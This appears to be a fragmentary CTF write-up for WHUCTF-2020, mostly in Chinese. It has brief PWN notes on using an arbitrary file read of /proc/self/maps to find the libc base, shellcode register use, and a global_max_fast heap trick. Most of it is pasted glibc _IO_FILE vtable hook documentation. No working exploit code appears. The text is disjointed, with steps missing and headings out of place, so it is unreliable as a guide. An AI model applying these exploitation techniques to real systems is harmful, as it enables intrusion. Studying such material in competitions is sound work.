# WHUCTF-2020 WriteUp

## #PWN

### #shellcode

#### #第二步，利用任意文件读收集信息

/etc/issue 中，我们找到系统版本为Ubuntu 16.04，由此确定libc版本为2.23。得到libc版本后为了调用libc中的函数，我们需要得到libc的基地址。这需要用到/proc文件系统的一些知识。可以通过读取/proc/self/maps来获得当前文件的memmap，进而获取libc基地址。

#### #第三步，实现目录读取

• 最好使用一个固定的寄存器来存储libc基址，这个存储器不应当被改动，这里我们使用rbx
• 每次执行函数时，需要计算函数偏移，存放在一个寄存器中（这里使用rax）。然后call rax

### #heaptrick

edit有个不明显的任意地址写0xcafebabe，考虑改global max fast。

libio/strops.c

### #overflow

#### #finish

The 'finish' function does any final cleaning up of an _IO_FILE object. It does not delete (free) it, but does everything else to finalize it. It matches the streambuf::~streambuf virtual destructor.

#### #overflow

The 'overflow' hook flushes the buffer. The second argument is a character, or EOF. It matches the streambuf::overflow virtual function.

#### #underflow

The 'underflow' hook tries to fills the get buffer. It returns the next character (as an unsigned char) or EOF. The next character remains in the get buffer, and the get position is not changed. It matches the streambuf::underflow virtual function.

#### #uflow

The 'uflow' hook returns the next character in the input stream (cast to unsigned char), and increments the read position; EOF is returned on failure. It matches the streambuf::uflow virtual function, which is not in the cfront implementation, but was added to C++ by the ANSI/ISO committee.

#### #pbackfail

The 'pbackfail' hook handles backing up. It matches the streambuf::pbackfail virtual function.

#### #xsputn

The 'xsputn' hook writes upto N characters from buffer DATA. Returns EOF or the number of character actually written. It matches the streambuf::xsputn virtual function.

#### #xsgetn

The 'xsgetn' hook reads upto N characters into buffer DATA. Returns the number of character actually read. It matches the streambuf::xsgetn virtual function.

#### #seekoff

The 'seekoff' hook moves the stream position to a new position relative to the start of the file (if DIR==0), the current position (MODE==1), or the end of the file (MODE==2). It matches the streambuf::seekoff virtual function. It is also used for the ANSI fseek function.

#### #seekpos

The 'seekpos' hook also moves the stream position, but to an absolute position given by a fpos64_t (seekpos). It matches the streambuf::seekpos virtual function. It is also used for the ANSI fgetpos and fsetpos functions.

#### #setbuf

The 'setbuf' hook gives a buffer to the file. It matches the streambuf::setbuf virtual function.

#### #sync

The 'sync' hook attempts to synchronize the internal data structures of the file with the external state. It matches the streambuf::sync virtual function.

#### #doallocate

The 'doallocate' hook is used to tell the file to allocate a buffer. It matches the streambuf::doallocate virtual function, which is not in the ANSI/ISO C++ standard, but is part traditional implementations.

The 'sysread' hook is used to read data from the external file into an existing buffer. It generalizes the Unix read(2) function. It matches the streambuf::sys_read virtual function, which is specific to this implementation.

#### #syswrite

The 'syswrite' hook is used to write data from an existing buffer to an external file. It generalizes the Unix write(2) function. It matches the streambuf::sys_write virtual function, which is specific to this implementation.

#### #sysseek

The 'sysseek' hook is used to re-position an external file. It generalizes the Unix lseek(2) function. It matches the streambuf::sys_seek virtual function, which is specific to this implementation.

#### #sysclose

The 'sysclose' hook is used to finalize (close, finish up) an external file. It generalizes the Unix close(2) function. It matches the streambuf::sys_close virtual function, which is specific to this implementation.

#### #sysstat

The 'sysstat' hook is used to get information about an external file into a struct stat buffer. It generalizes the Unix fstat(2) call. It matches the streambuf::sys_stat virtual function, which is specific to this implementation.

#### #showmany

The 'showmany' hook can be used to get an image how much input is available. In many cases the answer will be 0 which means unknown but some cases one can provide real information.

#### #imbue

The 'imbue' hook is used to get information about the currently installed locales.

## #MISC

（套，就硬套

### #wechat_game

text文件夹下文件内容疑似翻转（实际上就是，最近ctf总有这种套路），恢复后直接搜索字符串即可